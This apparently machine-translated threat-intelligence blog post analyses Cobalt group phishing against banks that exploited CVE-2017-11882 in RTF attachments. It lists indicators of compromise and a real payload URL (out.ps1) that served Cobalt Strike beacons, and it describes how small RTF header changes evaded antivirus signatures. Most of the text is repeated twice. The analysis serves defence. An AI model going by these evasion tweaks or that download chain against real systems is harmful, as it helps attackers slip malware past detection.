When hackers are faster than antiviruses
FinCERT, a structural division of the Central Bank for Information Security, in its latest report called the Cobalt group the main threat to banks, and its attacks the main trend. Cobalt, indeed, is now one of the most active and aggressive criminal groups. Over the year, experts calculated, she made at least 50 successful attacks around the world, constantly testing new tools, changing attack vectors and targets. In addition to contactless attacks on ATMs, Cobalt tries to gain access to interbank transfer systems (SWIFT), payment gateways and card processing. In this article, we will show why traditional remedies cannot save such groups from hacker attacks. And what to do to protect your business from financial and reputational losses.
Text: Andrei Zosimov, virus analyst.
On November 14, 2017, experts from Embedi published a technical report on the vulnerability CVE-2017-11882, and also demonstrated it in various versions of Microsoft Office products. This vulnerability allows you to execute arbitrary code, as well as download executable files and run them for execution. It has existed since 2000 - just then a vulnerable element of Microsoft Equation was created, or rather, “EQNEDT32.EXE”. This element allows you to embed math formulas in Office documents using OLE technology. With the release of Office 2007, this component has been updated, but support for the old version has remained for compatibility with old documents. So vulnerability has existed for 17 years.
CVE itself was registered on July 31, 2017, and a few days later, experts from Embedi reported it to Microsoft. The final patch from Microsoft was released only on November 14, 2017.
')
Three days ago, on November 21, the Proof of Concept vulnerability was published in Embedi's public GitHub repository (https://github.com/embedi/CVE-2017-11882), as well as a python script that allows you to create your own vulnerable. " rtf "document.
A few hours later, the Cobalt hacker group began a massive mailing of phishing emails to financial institutions that contained an attachment of a vulnerable document that was not detected by antivirus solutions:
A malicious document titled “Changes to the rules for making transfers. Rt” (MD5 F360D41A0B42B129F7F0C29F98381416, 31811 bytes) was distributed in the newsletter
The domain “cards-cbr.ru” from which this letter was sent was registered on the day of mailing - 2017-11-21. It has the IP address "104.254.99.77".
The following letter with empty content was also distributed.
Technical letter headers:
As we see, the anti-virus solution missed the malicious letter. As a result, the malicious attachment fell to a bank employee.
Our TDS Polygon system successfully detected the attack, issuing a 92% verdict, and the CERT Group-IB employee notified the client about the situation:
The detected malicious document (MD5 F360D41A0B42B129F7F0C29F98381416) was downloaded to Virustotal 2017-11-21 13:27:59 (UTC) and at that time was detected only by the Rising antivirus as "Exploit.CVE-2017-11882.Gen! 1.AED3 ( CLASSIC) ". It contained the following command, which it executed:
Judging by the file structure, it was obviously built using a published Python script. A few hours later, other anti-virus solutions began to detect the file as malicious, but the attackers immediately responded. They immediately reworked the exploit so that it again stopped being detected by many popular antiviruses (MD5 8993F927BEAF8DAA02BB792C86C2B5E0):
The domain name swift-alliance.com was created and registered by other persons 2016-08-24, but 2017-08-24 the registration term has expired, the Cobalt group criminals tracked this fact and registered this domain name on 21.11.2017. Now the domain name "swift-alliance.com" has a connection to the IP-address with the domain "cards-cbr.ru", participating in the previous mailing list. At the moment (11/22/2017) all of these domains have an IP address 139.59.89.20, and earlier on 21.11.2017 they had an IP address 104.254.99.67:
In both the same group acted - the load was loaded from the IP address "138.68.234.128", which distributes Cobalt-Strike. In the second case, the HTA executable file was loaded, which was executed through the mshta.exe program:
The downloaded file contains obfuscated JS, which as a result executes the encoded Powershell script:
As a result of this code execution, the PS script is downloaded from the remote hosting “http://104.254.99.77/out.ps1”, which is then executed. Loaded Powershell contains two coded Cobalt Beacons, which are launched according to the OS width.
The revised document is not so different from the original one, but there are still differences. First, the headers of the RTF document were changed:
As you can see, the keyword “objclass” was cut from the title of the object, which is optional:
The object name has been replaced with “Equation.3” by “1NYMiqIGRD”. Also, in the original version, the shellcode at the end was filled with the letters “A”, while in the converted exploit the remaining space is filled with spaces:
Signatures (marked in red) are not changed before and after the shellcode. In fact, the main changes were made to the headers of the RTF document and the embedded object, including at the end:
Here, the attackers simply changed the parameters of the image and added some of their own, which in fact do not affect anything:
"Picwgoal" and "pichgoal" - are responsible for the width and height of the pattern in twips
“Picw” and “pich” - are responsible for the width and height of the image in pixels
"Picscale" - image scaling.
What could be the way out of this situation? Threat Intelligence gives you the opportunity to be aware of attacks conducted by hacker groups, as well as to have at your disposal traffic analysis systems and sandboxes that will render the verdict to malicious files not on the basis of signatures, but using behavioral analysis and the accumulated knowledge base on the characteristic behavior of another hacker group.
Read the full version on the Group-IB blog.
Text: Andrei Zosimov, virus analyst.
On November 14, 2017, experts from Embedi published a technical report on the vulnerability CVE-2017-11882, and also demonstrated it in various versions of Microsoft Office products. This vulnerability allows you to execute arbitrary code, as well as download executable files and run them for execution. It has existed since 2000 - just then a vulnerable element of Microsoft Equation was created, or rather, “EQNEDT32.EXE”. This element allows you to embed math formulas in Office documents using OLE technology. With the release of Office 2007, this component has been updated, but support for the old version has remained for compatibility with old documents. So vulnerability has existed for 17 years.
CVE itself was registered on July 31, 2017, and a few days later, experts from Embedi reported it to Microsoft. The final patch from Microsoft was released only on November 14, 2017.
')
Three days ago, on November 21, the Proof of Concept vulnerability was published in Embedi's public GitHub repository (https://github.com/embedi/CVE-2017-11882), as well as a python script that allows you to create your own vulnerable. " rtf "document.
First activity
A few hours later, the Cobalt hacker group began a massive mailing of phishing emails to financial institutions that contained an attachment of a vulnerable document that was not detected by antivirus solutions:
A malicious document titled “Changes to the rules for making transfers. Rt” (MD5 F360D41A0B42B129F7F0C29F98381416, 31811 bytes) was distributed in the newsletter
The domain “cards-cbr.ru” from which this letter was sent was registered on the day of mailing - 2017-11-21. It has the IP address "104.254.99.77".
The following letter with empty content was also distributed.
Technical letter headers:
As we see, the anti-virus solution missed the malicious letter. As a result, the malicious attachment fell to a bank employee.
Our TDS Polygon system successfully detected the attack, issuing a 92% verdict, and the CERT Group-IB employee notified the client about the situation:
The detected malicious document (MD5 F360D41A0B42B129F7F0C29F98381416) was downloaded to Virustotal 2017-11-21 13:27:59 (UTC) and at that time was detected only by the Rising antivirus as "Exploit.CVE-2017-11882.Gen! 1.AED3 ( CLASSIC) ". It contained the following command, which it executed:
Judging by the file structure, it was obviously built using a published Python script. A few hours later, other anti-virus solutions began to detect the file as malicious, but the attackers immediately responded. They immediately reworked the exploit so that it again stopped being detected by many popular antiviruses (MD5 8993F927BEAF8DAA02BB792C86C2B5E0):
The domain name swift-alliance.com was created and registered by other persons 2016-08-24, but 2017-08-24 the registration term has expired, the Cobalt group criminals tracked this fact and registered this domain name on 21.11.2017. Now the domain name "swift-alliance.com" has a connection to the IP-address with the domain "cards-cbr.ru", participating in the previous mailing list. At the moment (11/22/2017) all of these domains have an IP address 139.59.89.20, and earlier on 21.11.2017 they had an IP address 104.254.99.67:
In both the same group acted - the load was loaded from the IP address "138.68.234.128", which distributes Cobalt-Strike. In the second case, the HTA executable file was loaded, which was executed through the mshta.exe program:
The downloaded file contains obfuscated JS, which as a result executes the encoded Powershell script:
As a result of this code execution, the PS script is downloaded from the remote hosting “http://104.254.99.77/out.ps1”, which is then executed. Loaded Powershell contains two coded Cobalt Beacons, which are launched according to the OS width.
Changes
The revised document is not so different from the original one, but there are still differences. First, the headers of the RTF document were changed:
As you can see, the keyword “objclass” was cut from the title of the object, which is optional:
The object name has been replaced with “Equation.3” by “1NYMiqIGRD”. Also, in the original version, the shellcode at the end was filled with the letters “A”, while in the converted exploit the remaining space is filled with spaces:
Signatures (marked in red) are not changed before and after the shellcode. In fact, the main changes were made to the headers of the RTF document and the embedded object, including at the end:
Here, the attackers simply changed the parameters of the image and added some of their own, which in fact do not affect anything:
"Picwgoal" and "pichgoal" - are responsible for the width and height of the pattern in twips
“Picw” and “pich” - are responsible for the width and height of the image in pixels
"Picscale" - image scaling.
And here is the conclusion: it was enough to change the document slightly and the anti-virus solutions are powerless in front of such an attack.
What could be the way out of this situation? Threat Intelligence gives you the opportunity to be aware of attacks conducted by hacker groups, as well as to have at your disposal traffic analysis systems and sandboxes that will render the verdict to malicious files not on the basis of signatures, but using behavioral analysis and the accumulated knowledge base on the characteristic behavior of another hacker group.
Read the full version on the Group-IB blog.
Source: https://habr.com/ru/post/343064/
All Articles